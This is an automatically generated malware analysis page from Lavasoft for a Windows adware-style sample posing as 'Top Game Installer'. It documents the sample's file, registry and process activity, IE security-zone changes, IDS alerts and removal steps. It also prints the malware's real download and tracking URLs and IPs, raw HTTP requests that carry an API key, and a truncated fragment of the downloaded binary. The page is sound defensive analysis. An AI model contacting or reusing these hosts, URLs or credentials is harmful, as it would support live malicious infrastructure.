Sample_6f2bf1378d

by malwarelabrobot on February 2nd, 2016 in Malware Descriptions.

mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 6f2bf1378dd9762eb931d387c9d82ae2
SHA1: bbf35b8129f83ec69e2cbe781ed97a02496ad882
SHA256: 5bd9a191e6dbb1f10a8be0ef8787d5deaf73e2bcd644c6d0cf874945ca60cbf1
SSDeep: 24576:6i8OH8F37JqsB9n7KkVj9XCwGA6SWa4B:4PJh kV5CQ
Size: 823808 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2016-01-02 12:03:09
Analyzed on: WindowsXP SP3 32-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

dwwin.exe:1160
drwtsn32.exe:1924
%original file name%.exe:1756
uninstallmodule.exe:596

The Malware injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process dwwin.exe:1160 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HLW8ZUJT\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (74488 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\E7C18NKY\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OTJDC59Y\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1DWWW7FS\desktop.ini (67 bytes)

The Malware deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (0 bytes)

The process drwtsn32.exe:1924 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\user.dmp (63379 bytes)
%Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\drwtsn32.log (102562 bytes)

The process %original file name%.exe:1756 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe.tmp (117724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\_uninsep.bat (180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe (6841 bytes)

The process uninstallmodule.exe:596 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (1979 bytes)

The Malware deletes the following file(s):

Registry activity

The process dwwin.exe:1160 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E8 2D 7D 7F 59 27 3A 40 96 A9 86 50 04 D7 AF 49"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process drwtsn32.exe:1924 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 53 19 18 94 1A AF 7F BD 34 B1 FE AB C2 6C 58"

[HKLM\SOFTWARE\Microsoft\DrWatson]
"NumberOfCrashes" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

The process %original file name%.exe:1756 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 0F 2B FC E3 76 78 28 83 52 27 62 6E 19 98 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"_uninsep.bat" = "_uninsep"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"uninstallmodule.exe" = "uninstallmodule"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Malware modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Malware modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Malware modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Malware deletes the following value(s) in system registry:
The Malware disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"IDSCPRODUCT"

The process uninstallmodule.exe:596 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "32 81 45 A5 55 CC 3F 10 6E 06 59 96 4F 20 5B EC"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]

The Malware deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"

Dropped PE files

MD5 File path
ea8c1b5d9f7b766e04ff296758ae02db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\uninstallmodule.exe
ea8c1b5d9f7b766e04ff296758ae02db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\uninstallmodule.exe.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Top Game Installer
Product Name: Top Game Installer
Product Version: 1.0
Legal Copyright: Top Game Installer
Legal Trademarks:
Original Filename: Top Game Installer.exe
Internal Name: Top Game Installer
File Version: 1.0
File Description: Top Game Installer
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 702060 702464 4.26697 7ad9425b8d1e50facb00531d536416c2
.data 708608 23332 23552 0.100838 b07224b3acd84b8b6e0fc450410d300f
.rdata 733184 62252 62464 3.8741 309dbdd93f7e20d17813b9619c24a4b9
.bss 798720 4096 0 0 d41d8cd98f00b204e9800998ecf8427e
.edata 802816 1602 2048 3.09246 f776cbf04fb9013797817e1ec3e1e355
.idata 806912 6224 6656 3.55701 8d96631479e9195377a207719f07d8fc
.CRT 815104 56 512 0.221488 94975933fb719c11f3a8757e452a06ce
.tls 819200 32 512 0.14174 b94bb441a067f954ca855273080a7f2c
.rsrc 823296 856 1024 1.8821 1a990b6f248f4cf9ed3f54d7b877969d
.reloc 827392 23424 23552 4.62335 79b8b80eed08886fb3685a3beee73b79

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{ 151.80.19.137
hxxp://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe 151.80.21.42
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_succeed 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_execute_succeed 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_start 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_start 151.80.19.137
hxxp://agent.wizztrakys.com/csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_end 151.80.19.137
www.wizzmonetize.com 149.202.85.170


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_end HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=cj12c3drql6dd1fbn72md4of34; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_execute_succeed HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=6ebfgo5m52mc1i8f1btginfai1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_start HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:12 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=9pj0telk0geot1e0qgookut5o3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_succeed HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:16 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=puamqss5sataeme8sfh85fsf90; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



POST /csdi/wizzmonetize/buying_uninstaller_{..|...|.."_{..|...|.."_{..|...|.."_wizzuninstallmodule_download_start HTTP/1.1
Host: agent.wizztrakys.com
Accept: */*
Content-Length: 59
Content-Type: application/x-www-form-urlencoded

user_name=csdi&api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c
HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:13 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=8ii2bcgrd4mk4u282k0o9fp0k4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 29
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}..



GET /download/1/wizzuninstallmodule.exe HTTP/1.1
Host: dl.wizzuniquify.com
Accept: */*


HTTP/1.1 200 OK
Date: Mon, 01 Feb 2016 15:35:13 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=eyJpdiI6ImJBak03ajRMXC9UeVJnKzR3ZUNFeEZnPT0iLCJ2YWx1ZSI6IkNaeEh6VGNlcU5kOUFkdW1ibnBoRFdadEtUa3FEK3diQ2k3WDI0SDZKeEtMWXh4aXk4emJodHB2WjhlSVM5ZisrVGMwUGcwdm1uT3hETU05dVR1V0ZBPT0iLCJtYWMiOiJkNjY3NzM4NmY2N2RhMTVjMTEzN2E5NTgxMzA1NWVjZThmZjQxMDI2M2IyNmE3ZDEzYWRjNTAwZWZjYWFiNWQ2In0=; expires=Mon, 01-Feb-2016 17:35:15 GMT; Max-Age=7200; path=/; httponly
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
df600..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
............................................ ....@....................
......P................ .........................<.................
......................0f..............................................
........D............................text.............................
..`.P`.data...d[... ...\[email protected]..
[email protected]@.bss..................................p..edata..<..
[email protected]@[email protected]..
[email protected].... ......................
[email protected][email protected].....................
......................................................................
......................................................................
......................................................................
.............................................................&......'.
......1.f.=..@.MZ..l.M.......h.M.......d.M.......t.M.....th...M..x.M..
.tJ..$.....n'....$.....2'....|[email protected].....)...=. L..tm1.....
..&......$.....$'....f...<.@[email protected][email protected]?f......j.
...........].........1.......K....v...$.:D...)..1......yt...,.........
1...........f...,...M..D$...M..D$...M..D$...M...$..M....M....M..D$..n&
.....M...,.........'....U1........WV.U.S....|...0.25..)..D$...........
@......@......@......@......@......@[email protected]
<<< skipped >>>

The Malware connects to the servers at the folowing location(s):

Strings from Dumps were not found.


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    dwwin.exe:1160
    drwtsn32.exe:1924
    %original file name%.exe:1756
    uninstallmodule.exe:596

  2. Delete the original Malware file.
  3. Delete or disinfect the following files created/modified by the Malware:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HLW8ZUJT\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\733A0.dmp (74488 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\E7C18NKY\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OTJDC59Y\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1DWWW7FS\desktop.ini (67 bytes)
    %Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\user.dmp (63379 bytes)
    %Documents and Settings%\All Users\Application Data\Microsoft\Dr Watson\drwtsn32.log (102562 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uninstallmodule.exe.tmp (117724 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\_uninsep.bat (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\30b1_appcompat.txt (1979 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now